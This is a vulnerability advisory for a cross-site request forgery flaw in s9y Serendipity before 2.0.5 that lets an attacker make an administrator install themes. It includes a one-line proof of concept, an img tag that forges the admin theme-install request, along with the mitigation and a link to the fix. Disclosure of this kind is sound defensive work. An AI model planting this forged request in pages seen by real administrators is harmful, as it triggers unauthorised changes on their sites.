s9y Serendipity Cross Site Request Forgery

2017.04.12

Credit: Zhiyang Zeng

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-352

Details

======

Software: s9y Serendipity

Version: <2.0.5

Homepage: https://docs.s9y.org/

=======

Description

================

Get type CSRF in Serendipity allows attacker installs any themes, no token here.

POC:

========

include this in the page ,then attack will occur:

<img src="http://127.0.0.1/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartlebya>

Mitigations

=======

update to Serendipity v2.1.x

========

FIX:

==========

https://github.com/s9y/Serendipity/issues/452

Best regards,

Zhiyang Zeng of Tencent security platform department

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

s9y Serendipity Cross Site Request Forgery

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.